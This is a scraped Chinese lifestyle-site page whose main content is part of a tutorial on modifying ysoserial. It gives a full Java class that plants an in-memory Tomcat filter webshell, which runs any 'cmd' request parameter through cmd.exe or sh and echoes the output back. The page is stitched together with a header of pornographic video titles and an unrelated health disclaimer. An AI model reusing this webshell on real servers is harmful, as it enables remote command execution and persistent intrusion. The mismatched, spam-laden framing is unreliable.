亚洲精品久久久久久第一页-人妻少妇精彩视品一区二区三区-91国产自拍免费视频-免费一级a在线播放视频正片-少妇天天日天天射天天爽-国产大屁股喷水视频在线观看-操美女骚穴抽插性爱视频-亚洲 欧美 中文字幕 丝袜-成人免费无码片在线观看

  1. 首頁 > 生活知識(shí) > >

系統(tǒng)自動(dòng)返顯方法 數(shù)據(jù)回顯是什么意思( 五 )

生活百科數(shù)據(jù)


0x04 改造yso#將前面代碼扣下來,并且繼承AbstractTranslet,后面需要使用TemplatesImpl類去動(dòng)態(tài)加載該類 。
package ysoserial.exploit;import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import org.apache.catalina.core.ApplicationContext;import org.apache.catalina.core.StandardContext;import org.apache.tomcat.util.descriptor.web.FilterMap;import javax.servlet.*;import java.io.IOException;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.lang.reflect.Modifier;public class TomcatShellIntInject extends AbstractTranslet {private final static String cmdParamName = "cmd";private final static String filterUrlPattern = "/*";private final static String filterName = "cmdFilter";static {try {Field wrap_same_object = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");Field lastServicedRequest = Class.forName("org.apache.catalina.core.ApplicationFilterChain").getDeclaredField("lastServicedRequest");Field lastServicedResponse = Class.forName("org.apache.catalina.core.ApplicationFilterChain").getDeclaredField("lastServicedResponse");lastServicedRequest.setAccessible(true);lastServicedResponse.setAccessible(true);wrap_same_object.setAccessible(true);//修改finalField modifiersField = Field.class.getDeclaredField("modifiers");modifiersField.setAccessible(true);modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);boolean wrap_same_object1 = wrap_same_object.getBoolean(null);ThreadLocal<ServletRequest> requestThreadLocal = (ThreadLocal<ServletRequest>) lastServicedRequest.get(null);ThreadLocal<ServletResponse> responseThreadLocal = (ThreadLocal<ServletResponse>) lastServicedResponse.get(null);wrap_same_object.setBoolean(null, true);lastServicedRequest.set(null, new ThreadLocal<ServletRequest>());lastServicedResponse.set(null, new ThreadLocal<ServletResponse>());ServletResponse servletResponse = responseThreadLocal.get();ServletRequest servletRequest = requestThreadLocal.get();ServletContext servletContext = servletRequest.getServletContext();//這里實(shí)際獲取到的是ApplicationContextFacadeif (servletContext != null) {//編寫惡意Filterclass ShellIntInject implements Filter {@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {String cmd = servletRequest.getParameter(cmdParamName);if (cmd != null) {String[] cmds = null;if (System.getProperty("os.name").toLowerCase().contains("win")) {cmds = new String[]{"cmd.exe", "/c", cmd};} else {cmds = new String[]{"sh", "-c", cmd};}java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\a");String output = s.hasNext() ? s.next() : "";java.io.Writer writer = servletResponse.getWriter();writer.write(output);writer.flush();writer.close();}filterChain.doFilter(servletRequest, servletResponse);}@Overridepublic void destroy() {}}//獲取ApplicationContextField context = servletContext.getClass().getDeclaredField("context");context.setAccessible(true);ApplicationContext ApplicationContext = (ApplicationContext) context.get(servletContext);//獲取standardContextField context1 = ApplicationContext.getClass().getDeclaredField("context");context1.setAccessible(true);StandardContext standardContext = (StandardContext) context1.get(ApplicationContext);//獲取LifecycleBase的state修改為org.apache.catalina.LifecycleState.STARTING_PREPField state = Class.forName("org.apache.catalina.util.LifecycleBase").getDeclaredField("state");state.setAccessible(true);state.set(standardContext, org.apache.catalina.LifecycleState.STARTING_PREP);//注冊(cè)filterNameFilterRegistration.Dynamic registration = ApplicationContext.addFilter(filterName, new ShellIntInject());//添加攔截路徑,實(shí)現(xiàn)是將存儲(chǔ)寫入到filterMap中registration.addMappingForUrlPatterns(java.util.EnumSet.of(DispatcherType.REQUEST), false, new String[]{filterUrlPattern});//調(diào)用filterStart方法將filterconfig進(jìn)行添加Method filterStart = Class.forName("org.apache.catalina.core.StandardContext").getMethod("filterStart");filterStart.setAccessible(true);filterStart.invoke(standardContext, null);//移動(dòng)filter為位置到前面FilterMap[] filterMaps = standardContext.findFilterMaps();for (int i = 0; i < filterMaps.length; i++) {if (filterMaps[i].getFilterName().equalsIgnoreCase(filterName)) {org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i];filterMaps[i] = filterMaps[0];filterMaps[0] = filterMap;break;}}servletResponse.getWriter().write("Success");state.set(standardContext, org.apache.catalina.LifecycleState.STARTED);}} catch (Exception e) {e.printStackTrace();}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}}yso中createTemplatesImpl稍做修改


以上關(guān)于本文的內(nèi)容,僅作參考!溫馨提示:如遇健康、疾病相關(guān)的問題,請(qǐng)您及時(shí)就醫(yī)或請(qǐng)專業(yè)人士給予相關(guān)指導(dǎo)!

「愛刨根生活網(wǎng)」www.malaban59.cn小編還為您精選了以下內(nèi)容,希望對(duì)您有所幫助: